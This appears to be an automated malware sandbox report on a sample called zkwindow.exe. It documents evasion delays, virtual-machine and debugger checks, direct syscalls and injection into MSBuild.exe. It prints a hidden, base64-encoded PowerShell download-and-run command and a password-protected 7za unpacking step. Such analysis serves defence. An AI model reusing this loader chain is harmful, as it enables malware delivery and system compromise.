                            Source: C:\Users\user\Desktop\zkwindow.exe TID: 7808Thread sleep time: -412000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exe TID: 7808Thread sleep time: -412000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 4388 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 5413 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -60000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -39992s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -59891s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -59781s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -43330s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -59672s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -33698s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -59563s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -59666s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -59453s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -55443s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5436Thread sleep time: -59344s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -30443s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -41168s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -45394s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -56410s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -44845s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -56086s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -44973s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -33215s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3228Thread sleep time: -300000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -56667s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -32042s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -46293s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -41362s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5872Thread sleep time: -1200000s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -52403s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -57070s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -42331s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -55824s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -35307s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -37564s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -39329s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -36240s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -54528s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -40276s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -50770s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -36092s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -32949s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -49871s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 612Thread sleep time: -56116s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D44C4 FindFirstFileExW,0_2_00007FF7013D44C4
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D4648 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7013D4648
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008E91B4 FindFirstFileW,FindFirstFileW,free,9_2_008E91B4
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D4C85C FindFirstFileW,FindNextFileW,FindClose,11_2_00D4C85C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D68844 FindFirstFileW,FindNextFileW,FindClose,11_2_00D68844
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D6082C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,11_2_00D6082C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D609B8 FindFirstFileW,FindNextFileW,FindClose,11_2_00D609B8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4B190 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_00C4B190
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4B75C FindFirstFileW,FindClose,11_2_00C4B75C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008EA254 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,9_2_008EA254
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008ED99C GetProcessAffinityMask,GetSystemInfo,9_2_008ED99C
                            Source: C:\Users\user\Desktop\zkwindow.exeThread delayed: delay time: 412000Jump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeThread delayed: delay time: 412000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39992Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59891Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59781Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43330Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59672Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33698Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59563Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59666Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59453Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55443Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59344Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30443Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41168Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45394Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56410Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44845Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56086Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44973Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33215Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56667Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32042Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46293Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41362Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52403Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57070Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42331Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55824Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35307Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37564Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39329Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36240Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54528Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40276Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50770Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36092Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32949Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49871Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56116Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                            Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                            Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                            Source: MSBuild.exe, 0000000E.00000002.2491991927.00000000008DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYY&
                            Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                            Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                            Source: cmd.exe, 00000010.00000002.2069760672.00000000051BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                            Source: powershell.exe, 00000001.00000002.1585418830.0000022CC8890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013CC3A0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7013CC3A0
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013C8B50 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,SleepEx,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,CreateProcessA,FreeLibrary,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7013C8B50
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D5B30 GetProcessHeap,0_2_00007FF7013D5B30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013CBA00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7013CBA00
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013CC3A0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7013CC3A0
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013CC584 SetUnhandledExceptionFilter,0_2_00007FF7013CC584
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D152C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7013D152C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01628090 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_01628090
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162B0A8 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0162B0A8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01629223 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_01629223
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeNtQuerySystemInformation: Direct from: 0xB563A2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeNtProtectVirtualMemory: Direct from: 0x77747B2EJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeNtQuerySystemInformation: Direct from: 0xC463A2Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeNtProtectVirtualMemory: Direct from: 0x700D2DDDJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeNtProtectVirtualMemory: Direct from: 0x6CC82D26Jump to behavior
                            Maps a DLL or memory area into another process
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B9E1000Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 5F2008Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B9E1000Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FF1008Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -nop -noni -e"n"c wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamgagac0aygbvahiaiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamwanaaoadqakagyadqbuagmadabpag8abgagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiab7aa0acgagacaaiaagahaayqbyageabqaoafsacwb0ahiaaqbuagcaxqakahaayqbnaguavqbyagwakqanaaoaiaagacaaiaakahiazqbzahaabwbuahmazqagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabwageazwblafuacgbsacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwanaaoaiaagacaaiaakagwaaqbuagsaiaa9acaajabyaguacwbwag8abgbzagualgbmagkabgbrahmaiab8acaavwboaguacgblac0atwbiagoazqbjahqaiab7acaajabfac4aaabyaguazgagac0abqbhahqaywboacaaigbcac4aegbpahaaigagah0aiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0argbpahiacwb0acaamqanaaoaiaagacaaiabpagyaiaaoacqababpag4aawapacaaewanaaoaiaagacaaiaagacaaiaagagkazgagacgajabsagkabgbrac4aaabyaguazgagac0abqbhahqaywboacaaigbeaggadab0ahaacwa/adoalwavaciakqagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahiazqb0ahuacgbuacaajabsagkabgbrac4aaabyaguazganaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaaiaagacaaiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaacgblahqadqbyag4aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauafuacgbpacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbvahiaaqagacqacgblahmacabvag4acwblac4aqgbhahmazqbsaguacwbwag8abgbzagualgbsaguacwbwag8abgbzaguavqbyagkakqasacaajabsagkabgbrac4aaabyaguazgapackalgbbagiacwbvagwadqb0aguavqbyagkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0adqakacaaiaagacaazqbsahmazqagahsadqakacaaiaagacaaiaagacaaiabyaguadab1ahiabgagacqabgb1agwabaanaaoaiaagacaaiab9aa0acgb9aa0acganaaoajabwageazwbladeaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwbhadeamwaxadmaoaa4aduanwa5agqamabdageayqa4adyamgbkadqarqbfadaaiganaaoajabwageazwbladiaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwawadeamaaxadaamqbhadgaoaa1adcaoqbkadaaqwbhageaoaa2adiazaa0aeuarqawaciadqakacqacwblahyazqbuafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamqanaaoajabtageabgbhagcazqbyafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamganaaoaaqbmacaakaatag4abwb0acaajabzaguadgblag4awgbpahaavqbyagwakqagahsaiabyaguadab1ahiabgagah0adqakagkazgagacgalqbuag8adaagacqabqbhag4ayqbnaguacgbaagkacabvahiabaapacaaewagahiazqb0ahuacgbuacaafqanaaoadqakacqacwblahyazqbuafoaaqbwafoaaqbwafaayqb0aggaiaa9acaasgbvagkabgatafaayqb0aggaiaakaguabgb2adoavabfae0auaagacianwb6adeaoqawadaalqb4adyanaauahoaaqbwaciadqakacqacwblahyazqbuafoaaqbwaeuaeab0ahiayqbjahqauabhahqaaaagad0aiabkag8aaqbuac0auabhahqaaaagacqazqbuahyaogbuaeuatqbqacaaiga3ahoaaqbwaciadqakaeka
                            Source: C:\Users\user\Desktop\zkwindow.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -nop -noni -e"n"c wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamgagac0aygbvahiaiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamwanaaoadqakagyadqbuagmadabpag8abgagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiab7aa0acgagacaaiaagahaayqbyageabqaoafsacwb0ahiaaqbuagcaxqakahaayqbnaguavqbyagwakqanaaoaiaagacaaiaakahiazqbzahaabwbuahmazqagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabwageazwblafuacgbsacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwanaaoaiaagacaaiaakagwaaqbuagsaiaa9acaajabyaguacwbwag8abgbzagualgbmagkabgbrahmaiab8acaavwboaguacgblac0atwbiagoazqbjahqaiab7acaajabfac4aaabyaguazgagac0abqbhahqaywboacaaigbcac4aegbpahaaigagah0aiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0argbpahiacwb0acaamqanaaoaiaagacaaiabpagyaiaaoacqababpag4aawapacaaewanaaoaiaagacaaiaagacaaiaagagkazgagacgajabsagkabgb